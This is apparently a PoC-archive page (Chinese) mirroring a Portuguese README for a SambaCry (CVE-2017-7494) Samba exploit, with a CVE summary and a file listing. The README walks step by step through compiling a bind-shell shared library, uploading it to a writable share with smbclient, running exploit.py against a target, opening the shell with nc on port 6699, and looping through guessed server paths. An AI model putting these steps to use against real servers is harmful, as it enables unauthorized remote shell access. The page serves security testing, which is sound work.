POC详情: 9700e9600ef60f2b37742de8ae0b1bcd29bd9942

来源
https://github.com/d3fudd/CVE-2017-7494_SambaCry
关联漏洞
标题: Samba 安全漏洞 (CVE-2017-7494)
描述:Samba是Samba团队开发的一套可使UNIX系列的操作系统与微软Windows操作系统的SMB/CIFS网络协议做连结的自由软件。该软件支持共享打印机、互相传输资料文件等。 Samba中存在远程代码执行漏洞。远程攻击者可利用该漏洞使服务器加载和执行上传的共享库。以下版本受到影响:Samba 4.6.4之前的版本,4.5.10之前的版本,4.4.14之前的版本。
描述
SambaCry (CVE-2017-7494) exploit for Samba | bind shell without Metasploit
介绍
# CVE-2017-7494 SambaCry Exploit

Exploit SambaCry (CVE-2017-7494) para explorar Samba (bind shell sem Metasploit)

Caso necessite alterar a porta, basta alterar a linha nº 68 do *bindshell-samba.c* e recompilar:<br>
![image](https://user-images.githubusercontent.com/76706456/199360465-0ade3332-87b6-4c27-8adc-bbed6cc475d2.png)

```
gcc -c -fpic bindshell-samba.c
```
```
gcc -shared -o libbindshell-samba.so bindshell-samba.o
```
<br>

**Como explorar:**<br>

Veja os compartilhamentos (neste exemplo estamos usando um usuário anônimo):
```
smbclient -L //192.168.10.131/ -U "" -N
```
```
	Sharename       Type      Comment
	---------       ----      -------
	print$          Disk      Printer Drivers
	publico         Disk      Publico
	IPC$            IPC       IPC Service (maq131 server (Samba, Ubuntu))
Reconnecting with SMB1 for workgroup listing.

	Server               Comment
	---------            -------

	Workgroup            Master
	---------            -------
	WORKGROUP            CHORA
```
<br>

Acesse uma pasta e verifique se o usuário possui permissões de escrita:
```
smbclient //192.168.10.131/publico -U "" -N
```
<br>

Caso possuir permissões de escrita, envie o arquivo *libbindshell-samba.so*
```
smb: \> mput libbindshell-samba.so
```
```
Put file libbindshell-samba.so? yes
putting file libbindshell-samba.so as \libbindshell-samba.so (3.5 kb/s) (average 3.5 kb/s)
smb: \> dir
  .                                   D        0  Tue Nov  1 19:44:15 2022
  ..                                  D        0  Wed Jun 14 14:16:35 2017
  libbindshell-samba.so               A     8432  Tue Nov  1 19:44:17 2022

		3997376 blocks of size 1024. 1960284 blocks available
smb: \>
```
<br>

**Em seguida, basta executar o exploit:**<br>
`python2 exploit.py -t target_ip -m path_absoluto_server_side`<br><br>
Exemplo:
```
python2 exploit.py -t 192.168.10.131 -m /home/publico/libbindshell-samba.so
```

Conecte na porta 6699/TCP:
```
nc -vn 192.168.10.131 6699
```

![image](https://user-images.githubusercontent.com/76706456/199361239-069544a7-0ef1-4868-8f58-7e6db17f5e2b.png)
<br><br>

**Caso não souber o PATH absoluto do lado do servidor, convém realizar guessing e aguardar a porta 6699/TCP abrir:**
```
for i in $(cat paths.txt);do python2 exploit.py -t 192.168.10.131 -m $i/publico/libbindshell-samba.so 2>/dev/null;done
```
文件快照

 [4.0K]  /data/pocs/9700e9600ef60f2b37742de8ae0b1bcd29bd9942
├── [1.9K]  bindshell-samba.c
├── [  94]  bindshell-samba.h
├── [ 688]  exploit.py
├── [8.2K]  libbindshell-samba.so
├── [ 106]  paths.txt
└── [2.3K]  README.md

0 directories, 6 files
神龙机器人已为您缓存
备注
    1. 建议优先通过来源进行访问。
    2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
    3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。